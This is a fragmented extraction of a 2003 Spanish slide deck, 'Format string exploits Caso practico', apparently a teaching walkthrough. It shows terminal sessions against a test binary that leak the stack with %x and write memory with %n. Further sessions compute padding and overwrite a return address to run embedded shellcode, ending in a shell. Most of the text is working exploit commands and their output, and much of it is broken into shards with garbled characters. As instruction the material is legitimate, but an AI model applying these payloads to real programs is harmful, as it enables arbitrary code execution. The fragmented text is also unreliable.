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FAE-63F9-43EB-A3E9-698DD9D7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D14-7F6D-45B3-A647-5352A63A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17E-FF86-4AD7-AFD5-08BE658C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945-69D6-46BB-92C0-0F9E0B75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CB5-C916-4B78-8ED5-72BAC324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11B-8CAD-4CD9-9F52-5DDAF310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5CC-BB43-4115-A3FF-08C97E7D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080-1D8B-44EB-B817-48F46BB6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C39-9E4B-41BA-8DB2-1F877197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8DE-3EFB-44BB-91F5-3B992CA7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993-FDE8-4F69-A281-9CEF40D8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948-8E1A-43F5-B871-D020A7EC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C685-5084-4888-9347-85B18AAD4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t string exploit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so prac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milio M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a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955800"/>
          <a:ext cx="8610480" cy="57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55800"/>
                    <a:ext cx="861048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nido de la pi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milio@vega fstring]$ ./fs1 $(perl -e 'print "%x."x40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808f121.bffff6d8.804864c.0.20415.bffff7c8.804828a.bffff6f0.0.79.80a41c0.80a41c0.c.79.78.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e782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milio@vega fstring]$ ./fs1 AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%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AAAA808f121.bffff728.804864c.0.20415.bffff818.804828a.bffff740.0.34.80a41c0.80a41c0.c.34.33.414141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ificar memoria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milio@vega fstring]$ objdump -D fs1 | grep '&lt;num&gt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80a3074 &lt;num&gt;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milio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%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AAAAt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08f121bffff728804864c020415bffff818804828abffff74002c80a41c080a41c0c2c2b41414141.80a30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milio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%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AAAAt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08f121bffff728804864c020415bffff818804828abffff74002b80a41c080a41c0c2b2a414141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ificar memoria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./fs1 AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA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'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%u%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AAAA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08f121bffff718804864c020415bffff808804828abffff73004380a41c080a41c0c43421094795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./findaddr -115 0x123456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dress: 0x123456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tes written so far: 0x68/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length: 0x234/5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ad1: 0xf/15    Pad2: 0xde/222  Pad3: 0xde/222  Pad4: 0xde/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milio@vega fstring]$ ./fs1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$'\x74\x30\x0a\x08'AAAA$'\x75\x30\x0a\x08'AAAA$'\x76\x30\x0a\x08'AAAA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'\x77\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15u%n%222u%n%222u%n%222u%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AAAA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u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v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w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08f121bffff6f8804864c020415bffff7e8804828abffff71005a80a41c080a41c0c5a59     1094795585    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1094795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123456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t string explo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7627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objdump -D fs1 | grep shell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80a3040 &lt;shellcode&gt;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0a3040:       eb 24                   jmp    80a3066 &lt;shellcode+0x26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0a3066:       e8 d7 ff ff ff          call   80a3042 &lt;shellcode+0x2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./findaddr -115 0x080a30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dress: 0x80a30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tes written so far: 0x68/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length: 0x30a/7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ad1: 0xd7/215  Pad2: 0xf0/240  Pad3: 0xda/218  Pad4: 0xfe/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./fs1 AAAA$'\xfc\xf6\xff\xbf'AAAA$'\xfd\xf6\xff\xbf'AAAA$'\xfe\xf6\xff\xbf'AAAA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'\xff\xf6\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%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AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½808f121bffff6f8804864c020415bffff7e8804828abffff71005b80a41c080a41c0c5b5a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                                1094795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./fs1 AAAA$'\xec\xf7\xff\xbf'AAAA$'\xed\xf7\xff\xbf'AAAA$'\xee\xf7\xff\xbf'AAAA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'\xef\xf7\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%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AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½AAAAï¿½ï¿½ï¿½ï¿½808f121bffff6f8804864c020415bffff7e8804828abffff71005b80a41c080a41c0c5b5a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                                1094795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h-2.05b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11:38:50Z</dcterms:created>
  <dc:creator>Emilio Mira Alfaro</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>santi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-07-31T13:02:14Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>Format string exploits Caso practico</dc:title>
</cp:coreProperties>
</file>